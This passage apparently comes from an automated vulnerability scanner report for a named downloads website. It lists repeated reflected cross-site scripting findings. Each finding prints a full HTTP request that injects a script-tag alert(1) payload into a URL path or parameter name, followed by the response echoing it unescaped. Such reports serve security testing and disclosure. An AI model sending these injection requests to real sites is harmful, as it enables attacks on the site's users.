...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-board-downloads.html?123df"><script>alert(1)</script>9a9ef9bad1b=1" />
...[SNIP]...

4.1505. http://www.x64bitdownload.com/64-bit-boards-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-boards-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1044f"><script>alert(1)</script>58b87c63170 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-boards-downloads.html?1044f"><script>alert(1)</script>58b87c63170=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-boards-downloads.html?1044f"><script>alert(1)</script>58b87c63170=1" />
...[SNIP]...

4.1506. http://www.x64bitdownload.com/64-bit-client-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-client-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 107a5"><script>alert(1)</script>5d3bbdbca7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-client-downloads.html107a5"><script>alert(1)</script>5d3bbdbca7a HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:32 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-client-downloads.html107a5"><script>alert(1)</script>5d3bbdbca7a" />
...[SNIP]...

4.1507. http://www.x64bitdownload.com/64-bit-client-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-client-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44255"><script>alert(1)</script>7cf0f112265 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-client-downloads.html?44255"><script>alert(1)</script>7cf0f112265=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:52:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-client-downloads.html?44255"><script>alert(1)</script>7cf0f112265=1" />
...[SNIP]...

4.1508. http://www.x64bitdownload.com/64-bit-conference-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-conference-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32275"><script>alert(1)</script>ad9b1cf51f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-conference-downloads.html?32275"><script>alert(1)</script>ad9b1cf51f1=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-conference-downloads.html?32275"><script>alert(1)</script>ad9b1cf51f1=1" />
...[SNIP]...

4.1509. http://www.x64bitdownload.com/64-bit-cross-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-cross-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9436b"><script>alert(1)</script>9d161df1015 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-cross-downloads.html9436b"><script>alert(1)</script>9d161df1015 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-cross-downloads.html9436b"><script>alert(1)</script>9d161df1015" />
...[SNIP]...

4.1510. http://www.x64bitdownload.com/64-bit-cross-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-cross-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6bda"><script>alert(1)</script>b40157044c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-cross-downloads.html?e6bda"><script>alert(1)</script>b40157044c5=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:49 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-cross-downloads.html?e6bda"><script>alert(1)</script>b40157044c5=1" />
...[SNIP]...

4.1511. http://www.x64bitdownload.com/64-bit-download-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-download-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8728"><script>alert(1)</script>1a0285ae469 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-download-downloads.htmlb8728"><script>alert(1)</script>1a0285ae469 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-download-downloads.htmlb8728"><script>alert(1)</script>1a0285ae469" />
...[SNIP]...

4.1512. http://www.x64bitdownload.com/64-bit-download-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-download-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51f31"><script>alert(1)</script>f94cfc1ffad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-download-downloads.html?51f31"><script>alert(1)</script>f94cfc1ffad=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-download-downloads.html?51f31"><script>alert(1)</script>f94cfc1ffad=1" />
...[SNIP]...

4.1513. http://www.x64bitdownload.com/64-bit-downloader-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-downloader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e057"><script>alert(1)</script>bfedfe770d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-downloader-downloads.html1e057"><script>alert(1)</script>bfedfe770d3 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:02 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-downloader-downloads.html1e057"><script>alert(1)</script>bfedfe770d3" />
...[SNIP]...

4.1514. http://www.x64bitdownload.com/64-bit-downloader-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-downloader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cabf"><script>alert(1)</script>1c16e82e365 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-downloader-downloads.html?6cabf"><script>alert(1)</script>1c16e82e365=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-downloader-downloads.html?6cabf"><script>alert(1)</script>1c16e82e365=1" />
...[SNIP]...

4.1515. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feff5"><script>alert(1)</script>b66c185e6a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.htmlfeff5"><script>alert(1)</script>b66c185e6a5 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:08 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A32%3A%22ext2fs-ext3fs-paragon-extbrowser%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A32%3A%22ext2fs+ext3fs+paragon+extbrowser%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.htmlfeff5"><script>alert(1)</script>b66c185e6a5" />
...[SNIP]...

4.1516. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 613af"><script>alert(1)</script>6093e6a1fe2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html?613af"><script>alert(1)</script>6093e6a1fe2=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:12 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A32%3A%22ext2fs-ext3fs-paragon-extbrowser%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A32%3A%22ext2fs+ext3fs+paragon+extbrowser%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html?613af"><script>alert(1)</script>6093e6a1fe2=1" />
...[SNIP]...

4.1517. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-fast-download-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ab62"><script>alert(1)</script>4dead600d30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-fast-download-downloads.html9ab62"><script>alert(1)</script>4dead600d30 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22fast-download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22fast+download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-fast-download-downloads.html9ab62"><script>alert(1)</script>4dead600d30" />
...[SNIP]...

4.1518. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-fast-download-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa2d1"><script>alert(1)</script>9e67a9dcdbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-fast-download-downloads.html?fa2d1"><script>alert(1)</script>9e67a9dcdbd=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22fast-download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22fast+download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-fast-download-downloads.html?fa2d1"><script>alert(1)</script>9e67a9dcdbd=1" />
...[SNIP]...

4.1519. http://www.x64bitdownload.com/64-bit-feed-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feed-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4260b"><script>alert(1)</script>fce09807565 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-feed-downloads.html4260b"><script>alert(1)</script>fce09807565 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-feed-downloads.html4260b"><script>alert(1)</script>fce09807565" />
...[SNIP]...

4.1520. http://www.x64bitdownload.com/64-bit-feed-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feed-downloads.html

